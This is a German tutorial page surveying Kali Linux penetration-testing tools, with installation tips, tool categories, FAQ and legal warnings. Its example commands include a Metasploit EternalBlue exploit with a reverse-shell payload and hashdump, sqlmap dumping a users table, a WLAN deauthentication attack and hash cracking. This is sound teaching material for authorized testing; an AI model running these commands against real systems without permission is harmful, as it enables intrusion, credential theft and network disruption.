Kali Linux Tools

KAPITEL 13 · PRAKTISCHE TOOLS

Kali Linux Tools

Das umfassendste Nachschlagewerk für über 600 vorinstallierte Pentesting-Tools in Kali Linux. Von Reconnaissance über Exploitation bis Forensik – alle Werkzeuge, Befehle und Workflows für professionelle IT-Sicherheitsanalysen.

Reconnaissance Exploitation Password Attacks Wireless Forensics 600+ Tools

Wichtiger rechtlicher Hinweis

Alle auf dieser Seite beschriebenen Tools und Techniken dienen ausschließlich Bildungszwecken und dem autorisierten Penetration Testing. Der Einsatz dieser Werkzeuge gegen Systeme, Netzwerke oder Personen ohne ausdrückliche schriftliche Genehmigung ist illegal und kann strafrechtliche Konsequenzen nach sich ziehen (§ 202a-c StGB, § 303a-b StGB).

  • Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine schriftliche Erlaubnis haben
  • Halten Sie sich an den vereinbarten Scope (Umfang) des Pentests
  • Dokumentieren Sie alle Aktivitäten und erstellen Sie einen verantwortungsvollen Bericht
  • Melden Sie gefundene Schwachstellen gemäß Responsible Disclosure
  • Beachten Sie die DSGVO und andere Datenschutzgesetze bei der Verarbeitung personenbezogener Daten

1. Was ist Kali Linux?

Definition

Kali Linux ist eine auf Debian basierende Linux-Distribution, die speziell für Penetration Testing, IT-Sicherheitsaudits und digitale Forensik entwickelt wurde. Sie wird von Offensive Security (OffSec) gepflegt und enthält über 600 vorinstallierte Sicherheitstools, die den gesamten Lebenszyklus eines Sicherheitsaudits abdecken.

Kali Linux ist der Nachfolger von BackTrack Linux und wurde 2013 erstmals veröffentlicht. Es ist die weltweit am häufigsten eingesetzte Distribution für ethisches Hacking und wird von Sicherheitsforschern, Pentestern, SOC-Analysten und Forensik-Experten weltweit genutzt.

600+
Vorinstallierte Tools
14
Tool-Kategorien
Debian
Basis-Distribution
2013
Erstveröffentlichung
ARM
Raspberry Pi Support
OSCP
Zertifizierung

Kali Linux vs. andere Distributionen

  • Kali Linux: All-in-One Pentesting-Distribution, 600+ Tools, Rolling Release
  • Parrot OS: Leichtgewichtige Alternative mit Fokus auf Privacy und Entwicklung
  • BlackArch: Arch-basiert mit über 2.800 Tools (größte Sammlung)
  • Commando VM: Windows-basierte Pentesting-Umgebung von FireEye
  • CSI Linux: Fokus auf OSINT und digitale Forensik

2. Installation & Setup

Kali Linux kann auf verschiedene Arten installiert und genutzt werden – je nach Anwendungsfall und Erfahrungsniveau.

Bare Metal Installation

Direkte Installation auf der Hardware. Beste Performance, aber dedizierter Rechner nötig.

ISO-Image USB-Boot Dual-Boot
Virtuelle Maschine

Empfohlene Methode für Einsteiger. Läuft in VirtualBox, VMware oder Hyper-V.

VirtualBox VMware Hyper-V
Docker Container

Leichtgewichtige Kali-Umgebung in Docker. Ideal für schnelle Tests und CI/CD.

Docker kalilinux/kali-rolling
WSL 2

Kali Linux unter Windows via Windows Subsystem for Linux. Kein Dual-Boot nötig.

WSL 2 Windows 10/11
Cloud-Instanz

Kali in der Cloud (AWS, Azure, GCP). Für externe Pentests und Bug Bounties.

AWS Azure DigitalOcean
Raspberry Pi / ARM

Kali auf ARM-Geräten. Ideal für physische Pentests und Drop-Box-Szenarien.

Raspberry Pi 4 ARM64

Schnellstart: Kali in Docker

BASH # Kali Linux Docker-Image herunterladen und starten $ docker pull kalilinux/kali-rolling $ docker run -it kalilinux/kali-rolling /bin/bash # Innerhalb des Containers: Tools installieren root@kali:/# apt update && apt install -y kali-linux-default # Oder nur die Top-10-Tools root@kali:/# apt install -y kali-tools-top10

Kali Metapackages – Tools nach Bedarf installieren

Kali Linux bietet praktische Metapackages, mit denen du nur die Tools installieren kannst, die du wirklich benötigst.

Metapackage Beschreibung Tools ca. Installationsbefehl
kali-linux-default Standard-Tools für den täglichen Pentesting-Einsatz ~400 sudo apt install kali-linux-default
kali-linux-large Erweiterte Tools – mehr als das Standard-Set ~550 sudo apt install kali-linux-large
kali-linux-everything Alle 600+ Tools – vollständige Installation 600+ sudo apt install kali-linux-everything
kali-tools-top10 Die 10 wichtigsten Tools für Einsteiger 10 sudo apt install kali-tools-top10
kali-tools-web Web-Application-Testing-Tools 50+ sudo apt install kali-tools-web
kali-tools-wireless Wireless- und WLAN-Tools 30+ sudo apt install kali-tools-wireless
kali-tools-forensics Forensik- und Analyse-Tools 40+ sudo apt install kali-tools-forensics
kali-tools-reverse-engineering Reverse-Engineering-Tools 30+ sudo apt install kali-tools-reverse-engineering
kali-tools-passwords Password-Cracking-Tools 25+ sudo apt install kali-tools-passwords
kali-tools-exploitation Exploitation- und Angriffs-Tools 40+ sudo apt install kali-tools-exploitation

Tipp zur Installation

Für Einsteiger: Beginne mit kali-linux-default oder kali-tools-top10. Installiere später bei Bedarf weitere Metapackages.

Speicherplatz: kali-linux-everything benötigt ca. 15-20 GB Speicherplatz. Für VMs mit begrenztem Speicher besser kali-linux-default oder kali-linux-large wählen.

Erste Schritte mit Kali Linux

Nach der Installation von Kali Linux – hier sind die wichtigsten ersten Befehle und Aktionen.

BASH # 1. System aktualisieren $ sudo apt update && sudo apt full-upgrade -y # 2. Root-Passwort ändern (Standard: toor) $ sudo passwd # 3. Netzwerk konfigurieren $ sudo ip a # Netzwerk-Interfaces anzeigen $ sudo nano /etc/network/interfaces # Statische IP konfigurieren # 4. Wichtige Tools testen $ nmap --version $ msfconsole --version $ wireshark --version # 5. Services starten/überprüfen $ sudo systemctl status ssh $ sudo systemctl start postgresql # Für Metasploit

Empfohlene erste Schritte

  • VM-Snapshots – Erstelle einen Snapshot, bevor du mit Test-Tools arbeitest
  • Nicht als Root arbeiten – Verwende einen normalen Benutzer für alltägliche Aufgaben
  • Kali-Tools erkunden – Starte mit nmap und msfconsole
  • Übungsumgebungen – Probiere HackTheBox oder TryHackMe für legales Üben
  • Dokumentation – Nutze man toolname oder toolname --help

3. Der Pentesting-Workflow

Ein professioneller Penetrationstest folgt einer strukturierten Methodik. Die Tools in Kali Linux sind genau auf diese Phasen abgestimmt.

Phasen eines Penetrationstests

1
Scoping

Ziele, Umfang und Regeln definieren

2
Reconnaissance

Informationen sammeln (passiv & aktiv)

3
Scanning

Ports, Dienste und Schwachstellen finden

4
Exploitation

Schwachstellen aktiv ausnutzen

5
Post-Exploitation

Privilegien erweitern, Daten sichern

6
Reporting

Befunde dokumentieren und berichten

4. Tool-Kategorien im Überblick

Kali Linux organisiert seine Tools in 14 Hauptkategorien. Hier eine detaillierte Übersicht der wichtigsten Kategorien und ihrer Werkzeuge.

30+ Tools

Information Gathering

Reconnaissance & OSINT

Passive und aktive Aufklärung über Zielsysteme, Netzwerke und Organisationen.

  • Nmap – Netzwerk-Scanner und Port-Scanner (der Standard)
  • Maltego – Visuelle OSINT- und Link-Analyse
  • theHarvester – E-Mail- und Subdomain-Sammlung
  • Recon-ng – Modulares OSINT-Framework
  • SpiderFoot – Automatisierte OSINT-Recherche
  • Shodan – Suchmaschine für IoT-Geräte
  • Dmitry – Deepmagic Information Gathering
  • whois / dnsenum / fierce – DNS-Aufklärung
20+ Tools

Vulnerability Analysis

Schwachstellen-Analyse

Automatisierte und manuelle Identifikation von Sicherheitslücken in Systemen und Anwendungen.

  • OpenVAS / Greenbone – Vollständiger Vulnerability Scanner
  • Nikto – Web-Server-Schwachstellenscanner
  • Nuclei – Template-basierter Vulnerability Scanner
  • Nessus – Industriestandard (kommerziell)
  • Lynis – Security Auditing für Unix/Linux
  • WPScan – WordPress-Schwachstellenscanner
25+ Tools

Web Application Analysis

Web-App-Pentesting

Spezialisierte Tools für die Analyse und den Angriff auf Webanwendungen (OWASP Top 10).

  • Burp Suite – Der Standard-Web-Proxy (Community/Pro)
  • OWASP ZAP – Kostenloser Web-App-Scanner
  • SQLmap – Automatisierte SQL-Injection
  • Nikto – Web-Server-Scanner
  • Gobuster / Dirb / ffuf – Directory Bruteforcing
  • Commix – Command Injection Exploitation
  • XSStrike – XSS-Detection und Exploitation
20+ Tools

Password Attacks

Passwort-Cracking & Brute-Force

Offline- und Online-Passwort-Angriffe, Hash-Cracking und Credential Stuffing.

  • John the Ripper – CPU-basiertes Hash-Cracking
  • Hashcat – GPU-basiertes Hash-Cracking (schnellstes)
  • Hydra – Online-Brute-Force (SSH, FTP, HTTP, etc.)
  • Medusa – Paralleles Brute-Force-Tool
  • CeWL – Custom Wordlist Generator
  • Crunch – Wordlist-Generator
  • Mimikatz – Windows-Credential-Extraktion
15+ Tools

Wireless Attacks

WLAN & Bluetooth Pentesting

WLAN-Sicherheitsanalyse, WPA/WPA2-Cracking und Bluetooth-Angriffe.

  • Aircrack-ng – WEP/WPA/WPA2-Cracking Suite
  • Wifite2 – Automatisierter WLAN-Angriff
  • Kismet – WLAN-Detektor und Sniffer
  • Reaver / Bully – WPS-PIN-Brute-Force
  • Fern Wifi Cracker – GUI-basiertes WLAN-Tool
  • Bettercap – Netzwerk-Schweizer-Taschenmesser
30+ Tools

Exploitation Tools

Schwachstellen ausnutzen

Frameworks und Einzeltools zur aktiven Ausnutzung gefundener Schwachstellen.

  • Metasploit Framework – Das mächtigste Exploitation-Framework
  • Searchsploit – Offline-Exploit-Datenbank (Exploit-DB)
  • BeEF – Browser Exploitation Framework
  • Armitage – Grafische Metasploit-Oberfläche
  • msfvenom – Payload-Generator
  • Empire / Covenant – Post-Exploitation-Frameworks
15+ Tools

Sniffing & Spoofing

Netzwerkverkehr abhören

Netzwerkpakete mitschneiden, analysieren und manipulieren. Man-in-the-Middle-Angriffe.

  • Wireshark – Der Standard-Netzwerk-Protokoll-Analyzer
  • tcpdump – Kommandozeilen-Paket-Sniffer
  • Responder – LLMNR/NBT-NS/mDNS Poisoning
  • Ettercap – MITM-Framework
  • Bettercap – Modernes MITM-Tool
  • mitmproxy – HTTP/HTTPS-Proxy
15+ Tools

Post Exploitation

Nach dem Einbruch

Privilege Escalation, Lateral Movement, Persistenz und Datenextraktion nach erfolgreichem Zugriff.

  • LinPEAS / WinPEAS – Privilege Escalation Enumeration
  • Mimikatz – Windows-Passwörter extrahieren
  • BloodHound – Active Directory Angriffs-Pfade
  • CrackMapExec – Netzwerk-Penetration (SMB, WMI)
  • Impacket – Netzwerkprotokoll-Toolkit
  • PowerSploit – PowerShell Post-Exploitation
25+ Tools

Forensics Tools

Digitale Forensik

Untersuchung von Sicherheitsvorfällen, Datenwiederherstellung und Beweissicherung.

  • Autopsy – Grafische Forensik-Plattform
  • Volatility – RAM-Analyse (Memory Forensics)
  • Sleuth Kit – Dateisystem-Forensik
  • Binwalk – Firmware-Analyse
  • Foremost / Scalpel – File Carving
  • dd / dcfldd – Forensische Disk-Images
15+ Tools

Reverse Engineering

Malware-Analyse & Decompiling

Binäranalyse, Decompiling und Malware-Untersuchung auf Assembly-Ebene.

  • Ghidra – NSA Reverse Engineering Framework
  • radare2 / r2 – Kommandozeilen-Disassembler
  • OllyDbg / x64dbg – Windows-Debugger
  • GDB – GNU Debugger
  • IDA Free – Disassembler (kommerziell/Free)
  • JD-GUI – Java Decompiler
10+ Tools

Reporting Tools

Berichterstattung

Erstellung professioneller Pentest-Reports und Dokumentation der Ergebnisse.

  • Faraday – Collaborative Pentest-Plattform
  • Dradis – Reporting-Framework
  • CherryTree – Hierarchische Notiz-App
  • KeepNote – Pentest-Notizbuch
  • Pwndoc – Pentest-Report-Generator

5. Nmap – Der Netzwerk-Scanner

Nmap (Network Mapper)

Nmap ist das wichtigste Tool in jedem Pentester-Arsenal. Es scannt Netzwerke, erkennt offene Ports, identifiziert Dienste und Betriebssysteme und findet Schwachstellen.

Hauptfunktionen

Port-Scanning, Service-Detection, OS-Fingerprinting, Script-Scanning (NSE), Firewall-Erkennung.

TCP SYN Scan UDP Scan NSE Scripts OS Detection
Steckbrief

Typ: Netzwerk-Scanner
Kategorie: Information Gathering
Plattform: Linux, Windows, macOS
Lizenz: Open Source (GPL)
Website: nmap.org

Wichtige Nmap-Befehle

BASH # Einfacher TCP-SYN-Scan auf alle Ports $ nmap -sS -p- 192.168.1.100 # Service- und Versionserkennung $ nmap -sV -sC 192.168.1.100 # OS-Erkennung + aggressiver Scan $ nmap -O -A 192.168.1.100 # Schneller Scan der Top-100-Ports $ nmap -F -T4 192.168.1.0/24 # UDP-Scan (langsam, aber wichtig) $ nmap -sU --top-ports 100 192.168.1.100 # NSE-Skript für Schwachstellen $ nmap --script vuln 192.168.1.100 # Kompletter Pentest-Scan (alle Checks) $ nmap -sC -sV -O -p- -T4 -oA scan_ergebnis 192.168.1.100

6. Metasploit Framework

Metasploit Framework (MSF)

Metasploit ist das leistungsstärkste Exploitation-Framework der Welt. Es enthält über 2.000 Exploits, 500+ Payloads und zahlreiche Hilfs-Module für alle Phasen eines Pentests.

Komponenten

msfconsole: Haupt-Interface
Exploits: Angriffsmodule für bekannte CVEs
Payloads: Code, der nach dem Exploit ausgeführt wird
Auxiliary: Scanner, Fuzzer, Sniffer
Post: Post-Exploitation-Module
Encoders: Payload-Verschleierung

Steckbrief

Typ: Exploitation Framework
Kategorie: Exploitation
Entwickler: Rapid7
Lizenz: Open Source (BSD)
Versionen: Framework (Free), Pro (Commercial)

Metasploit-Grundbefehle

MSFCONSOLE # Metasploit starten $ msfconsole # Nach einem Exploit suchen msf6 > search eternalblue # Exploit auswählen msf6 > use exploit/windows/smb/ms17_010_eternalblue # Optionen anzeigen und setzen msf6 exploit(...) > show options msf6 exploit(...) > set RHOSTS 192.168.1.100 msf6 exploit(...) > set LHOST 192.168.1.50 msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # Exploit ausführen msf6 exploit(...) > exploit # Meterpreter-Session (nach erfolgreichem Exploit) meterpreter > sysinfo meterpreter > getuid meterpreter > getsystem meterpreter > hashdump

7. Wireshark – Netzwerk-Protokoll-Analyzer

Wireshark

Wireshark ist der weltweit meistgenutzte Netzwerk-Protokoll-Analyzer. Er ermöglicht die tiefgehende Untersuchung von Netzwerkpaketen in Echtzeit und ist unverzichtbar für Netzwerk-Forensik, Troubleshooting und Sicherheitsanalysen.

Hauptfunktionen

Live-Capture, Offline-Analyse, 2.000+ Protokoll-Dissectoren, Follow TCP Stream, Farbfilter, Export-Objekte, VoIP-Analyse.

Packet Capture Deep Inspection Decryption Statistics
Nützliche Display-Filter

http.request – HTTP-Anfragen
tcp.port == 443 – HTTPS-Traffic
ip.addr == 192.168.1.100 – Bestimmte IP
dns – DNS-Anfragen
tcp.flags.syn == 1 – SYN-Pakete

8. Burp Suite – Web-App-Pentesting

Burp Suite

Burp Suite ist der Industriestandard für Web-Application-Security-Testing. Es fungiert als intercepting Proxy zwischen Browser und Web-Server und ermöglicht die vollständige Kontrolle über HTTP/HTTPS-Traffic.

Module

Proxy: Traffic abfangen und manipulieren
Repeater: Anfragen manuell wiederholen
Intruder: Automatisierte Angriffe (Brute-Force, Fuzzing)
Scanner: Automatische Schwachstellensuche (Pro)
Decoder: Kodierung/Decodierung (Base64, URL, HTML)
Comparer: Unterschiede zwischen Anfragen finden

Steckbrief

Typ: Web Application Proxy/Scanner
Kategorie: Web Application Analysis
Entwickler: PortSwigger
Versionen: Community (Free), Professional ($449/Jahr), Enterprise
Alternative: OWASP ZAP (kostenlos)

9. Password Cracking – Hashcat & John the Ripper

Hashcat vs. John the Ripper

Eigenschaft Hashcat John the Ripper
Typ GPU-basiert (OpenCL/CUDA) CPU-basiert (mit GPU-Support)
Geschwindigkeit Extrem schnell (Milliarden Hashes/s) Moderat (Millionen Hashes/s)
Hash-Typen 350+ Hash-Modi 300+ Hash-Formate
Wordlists rockyou.txt, custom rockyou.txt, custom, Rules
Angriffsmodi Dictionary, Brute-Force, Mask, Hybrid, Rule Dictionary, Incremental, Wordlist, Rule
Beste Nutzung Große Hash-Dumps, GPU-Cluster Schnelle Tests, CPU-only-Umgebungen

Hashcat-Beispiele

BASH # MD5-Hash mit Wordlist cracken $ hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt # WPA2-Handshake cracken $ hashcat -m 22000 -a 0 handshake.hc22000 rockyou.txt # NTLM-Hash (Windows) cracken $ hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt # Mask-Angriff (z.B. 8-stellig, nur Kleinbuchstaben) $ hashcat -m 0 -a 3 hash.txt ?l?l?l?l?l?l?l?l

10. SQLmap – SQL-Injection-Automatisierung

SQLmap

SQLmap ist das leistungsstärkste Open-Source-Tool zur automatischen Erkennung und Ausnutzung von SQL-Injection-Schwachstellen. Es unterstützt alle gängigen Datenbankmanagementsysteme (MySQL, PostgreSQL, MSSQL, Oracle, SQLite, etc.).

BASH # Einfache SQL-Injection-Prüfung $ sqlmap -u "http://ziel.de/page?id=1" --batch # Datenbanken auflisten $ sqlmap -u "http://ziel.de/page?id=1" --dbs # Tabellen einer Datenbank dumpen $ sqlmap -u "http://ziel.de/page?id=1" -D webapp --tables # Gesamte Tabelle extrahieren $ sqlmap -u "http://ziel.de/page?id=1" -D webapp -T users --dump # Mit Cookie-Authentifizierung $ sqlmap -u "http://ziel.de/page?id=1" --cookie "session=abc123" --level 3 --risk 2

11. Aircrack-ng – WLAN-Sicherheit

Aircrack-ng Suite

Die Aircrack-ng-Suite ist das Standard-Toolkit für WLAN-Sicherheitsaudits. Sie umfasst Tools zum Monitoring, Angreifen, Testen und Cracken von WEP- und WPA/WPA2-Netzwerken.

BASH # 1. Monitor-Modus aktivieren $ airmon-ng start wlan0 # 2. WLAN-Netzwerke scannen $ airodump-ng wlan0mon # 3. Ziel-Netzwerk überwachen und Handshake einfangen $ airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # 4. Deauth-Angriff (Client trennen für Handshake) $ aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon # 5. WPA-Handshake mit Wordlist cracken $ aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

12. Weitere unverzichtbare Tools

Responder

LLMNR/NBT-NS/mDNS Poisoner. Fängt Windows-Authentifizierungs-Hashes im Netzwerk ab. Extrem effektiv in Active-Directory-Umgebungen.

MITM NTLM Active Directory
BloodHound

Visualisiert Active-Directory-Beziehungen und findet Angriffspfade. Zeigt den kürzesten Weg zu Domain Admin.

Active Directory Graph Theory Privilege Escalation
CrackMapExec

„Swiss Army Knife" für Windows-Netzwerke. SMB, WMI, MSSQL, WinRM – Credential Spraying und Lateral Movement.

SMB WMI Lateral Movement
Gobuster / ffuf

Directory- und File-Brute-Forcing für Web-Server. Findet versteckte Pfade, Admin-Panels und Backup-Dateien.

Directory Bruteforce VHost Discovery DNS
msfvenom

Payload-Generator aus dem Metasploit-Framework. Erstellt Reverse Shells, Bind Shells und Meterpreter-Payloads in verschiedenen Formaten.

Payloads Reverse Shell Encoding
Evil-WinRM

WinRM-Shell für Windows-Remote-Management. Ermöglicht PowerShell-Sessions auf entfernten Windows-Systemen.

WinRM PowerShell Windows

13. Tool-Vergleich nach Pentest-Phase

Phase Top-Tools Schwierigkeit Wirkung
Reconnaissance Nmap, Maltego, theHarvester, Recon-ng, Shodan ⭐⭐ Hoch
Scanning Nmap, OpenVAS, Nikto, Nuclei ⭐⭐ Sehr Hoch
Web App Testing Burp Suite, OWASP ZAP, SQLmap, ffuf ⭐⭐⭐ Kritisch
Exploitation Metasploit, Searchsploit, msfvenom, BeEF ⭐⭐⭐⭐ Kritisch
Password Attacks Hashcat, John, Hydra, Mimikatz ⭐⭐⭐ Hoch
Wireless Aircrack-ng, Wifite, Kismet, Reaver ⭐⭐⭐ Mittel-Hoch
Sniffing / MITM Wireshark, Responder, Bettercap, mitmproxy ⭐⭐⭐ Hoch
Post-Exploitation BloodHound, CrackMapExec, LinPEAS, Impacket ⭐⭐⭐⭐ Kritisch
Forensics Autopsy, Volatility, Sleuth Kit, Binwalk ⭐⭐⭐⭐ Hoch
Reporting Faraday, Dradis, CherryTree, Pwndoc ⭐⭐ Essenziell

14. FAQ – Häufige Fragen & Antworten

Häufige Fragen zu Kali Linux und Pentesting-Tools

Ist Kali Linux legal zu benutzen?

Ja, Kali Linux an sich ist vollkommen legal. Es ist eine Open-Source-Linux-Distribution wie jede andere. Die Legalität hängt davon ab, wie Sie die Tools einsetzen:

  • Legal: Auf eigenen Systemen, mit schriftlicher Erlaubnis des Eigentümers, in autorisierten Bug-Bounty-Programmen
  • Illegal: Gegen fremde Systeme ohne Erlaubnis, auch wenn „nur getestet" wird

In Deutschland gelten insbesondere § 202a-c StGB (Hacking-Paragraphen) und § 303a-b StGB (Datenveränderung/Computersabotage).

Welche Tools sollte ein Anfänger zuerst lernen?

Die empfohlene Reihenfolge für Einsteiger:

  • 1. Nmap: Netzwerk-Scanning ist die Grundlage jedes Pentests
  • 2. Wireshark: Netzwerkverkehr verstehen
  • 3. Burp Suite (Community): Web-App-Grundlagen
  • 4. SQLmap: SQL-Injection verstehen
  • 5. Metasploit: Exploitation-Grundlagen
  • 6. John the Ripper / Hashcat: Passwort-Cracking
  • 7. Hydra: Online-Brute-Force
  • 8. Gobuster: Directory-Discovery

Üben Sie auf legalen Plattformen wie TryHackMe, HackTheBox oder VulnHub.

Kann ich Kali Linux als tägliches Betriebssystem nutzen?

Nein, das wird nicht empfohlen. Kali Linux ist als spezialisiertes Pentesting-Tool konzipiert, nicht als Alltags-OS:

  • Standard-Root-Benutzer (Sicherheitsrisiko im Alltag)
  • Viele unnötige Dienste für den täglichen Gebrauch
  • Kein Fokus auf Multimedia, Office oder Gaming
  • Rolling Release kann zu Instabilität führen

Empfehlung: Nutzen Sie Kali in einer VM, Docker oder WSL2 und behalten Sie Ihr normales OS (Ubuntu, Fedora, Windows) für den Alltag.

Was ist der Unterschied zwischen Nmap SYN-Scan und Connect-Scan?

SYN-Scan (-sS): Sendet nur ein SYN-Paket und wartet auf SYN/ACK. Der TCP-Handshake wird nie abgeschlossen. Schneller und unauffälliger, benötigt aber Root-Rechte.

Connect-Scan (-sT): Führt den vollständigen TCP-3-Wege-Handshake durch (SYN → SYN/ACK → ACK). Langsamer und auffälliger, funktioniert aber ohne Root-Rechte.

# SYN-Scan (Standard mit Root) $ sudo nmap -sS 192.168.1.100 # Connect-Scan (ohne Root) $ nmap -sT 192.168.1.100
Wie lange dauert es, ein Passwort mit Hashcat zu cracken?

Das hängt von mehreren Faktoren ab:

  • Hash-Typ: MD5 (schnell) vs. bcrypt (langsam)
  • Passwort-Komplexität: „passwort123" vs. „Kx#9mP!qL2$wR"
  • Hardware: RTX 4090 vs. integrierte GPU
  • Wordlist: rockyou.txt (14 Mio.) vs. custom

Beispiel (RTX 4090):

  • MD5, 8 Zeichen, nur Kleinbuchstaben: ~Sekunden
  • NTLM, 10 Zeichen, gemischt: ~Stunden bis Tage
  • bcrypt, 12 Zeichen, komplex: ~Jahre bis unmöglich
Welche Zertifizierungen gibt es für Pentesting?

Die wichtigsten Pentesting-Zertifizierungen:

  • OSCP (Offensive Security Certified Professional): Der Goldstandard, 24h-Prüfung, sehr praxisorientiert
  • CEH (Certified Ethical Hacker): EC-Council, breites Grundlagenwissen
  • CompTIA PenTest+: Einsteigerfreundlich, theoretisch + praktisch
  • PNPT (Practical Network Penetration Tester): TCM Security, modern und praxisnah
  • OSWE (Offensive Security Web Expert): Fortgeschrittenes Web-Pentesting
  • OSEP (Offensive Security Experienced Penetration Tester): Advanced Evasion
Wo kann ich legal Pentesting üben?

Es gibt zahlreiche legale Plattformen zum Üben:

  • TryHackMe: Geführte Labs, ideal für Einsteiger (kostenlos + Premium)
  • HackTheBox: Realistische Maschinen, mittlere bis hohe Schwierigkeit
  • VulnHub: Downloadbare VMs zum lokalen Üben
  • PortSwigger Web Security Academy: Kostenlose Web-App-Labs von Burp Suite
  • OverTheWire: Wargames für Linux und Netzwerk-Sicherheit
  • PentesterLab: Hands-on Pentesting-Übungen
  • Bug Bounty Plattformen: HackerOne, Bugcrowd (reale Systeme, mit Erlaubnis)
Was ist der Unterschied zwischen einem Penetrationstest und einem Vulnerability Scan?

Vulnerability Scan: Automatisierte Suche nach bekannten Schwachstellen (z.B. mit OpenVAS oder Nessus). Findet potenzielle Probleme, prüft aber nicht, ob sie tatsächlich ausnutzbar sind. Schnell und kostengünstig.

Penetrationstest: Manueller, tiefgehender Angriff auf die Infrastruktur durch einen erfahrenen Tester. Geht über das Scannen hinaus und versucht aktiv, Schwachstellen auszunutzen, um die tatsächliche Auswirkung zu demonstrieren. Teurer, aber viel aussagekräftiger.

Analogie: Ein Vulnerability Scan ist wie eine Inspektion, die offene Türen findet. Ein Pentest ist wie ein Einbrecher, der tatsächlich durch die offene Tür geht und zeigt, was er stehlen könnte.

Zusammenfassung

Die wichtigsten Punkte

  • Kali Linux: Debian-basierte Pentesting-Distribution mit 600+ vorinstallierten Tools
  • Nmap: Der Standard-Netzwerk-Scanner – das wichtigste Tool im Arsenal
  • Metasploit: Leistungsstärkstes Exploitation-Framework mit 2.000+ Exploits
  • Burp Suite: Industriestandard für Web-Application-Security-Testing
  • Wireshark: Weltweit meistgenutzter Netzwerk-Protokoll-Analyzer
  • Hashcat / John: GPU/CPU-basiertes Passwort-Cracking
  • SQLmap: Automatisierte SQL-Injection-Erkennung und -Ausnutzung
  • Aircrack-ng: Standard-Toolkit für WLAN-Sicherheitsaudits
  • Post-Exploitation: BloodHound, CrackMapExec, Mimikatz für AD-Angriffe
  • Forensik: Autopsy, Volatility, Sleuth Kit für Incident Response
  • Ethik: Nur mit schriftlicher Erlaubnis testen – sonst strafbar!
  • Üben: TryHackMe, HackTheBox, VulnHub für legale Übungsumgebungen

Nächste Schritte

Bereit, Ihre Pentesting-Skills zu verbessern? Starten Sie mit den Grundlagen und arbeiten Sie sich vor:

  • Installieren Sie Kali Linux in einer VM (VirtualBox/VMware)
  • Erstellen Sie einen Account auf TryHackMe und starten Sie den „Complete Beginner"-Pfad
  • Lernen Sie Nmap, Burp Suite und Metasploit als erste Tools
  • Üben Sie auf VulnHub-Maschinen in Ihrer lokalen VM-Umgebung
  • Arbeiten Sie auf die OSCP- oder PNPT-Zertifizierung hin

Weiterführende Themen

Sicherheitsgrundlagen

CIA-Triade, Bedrohungsmodelle, Risikoanalyse und Security-Frameworks.

Zu Sicherheitsgrundlagen
Netzwerksicherheit

Firewalls, IDS/IPS, VPN, Segmentierung und Zero Trust.

Zur Netzwerksicherheit
Netzwerktools

nmap, ping, traceroute, netstat, dig und weitere Netzwerk-Tools.

Zu Netzwerktools
Kryptographie

Verschlüsselung, Hashing, digitale Signaturen und PKI.

Zur Kryptographie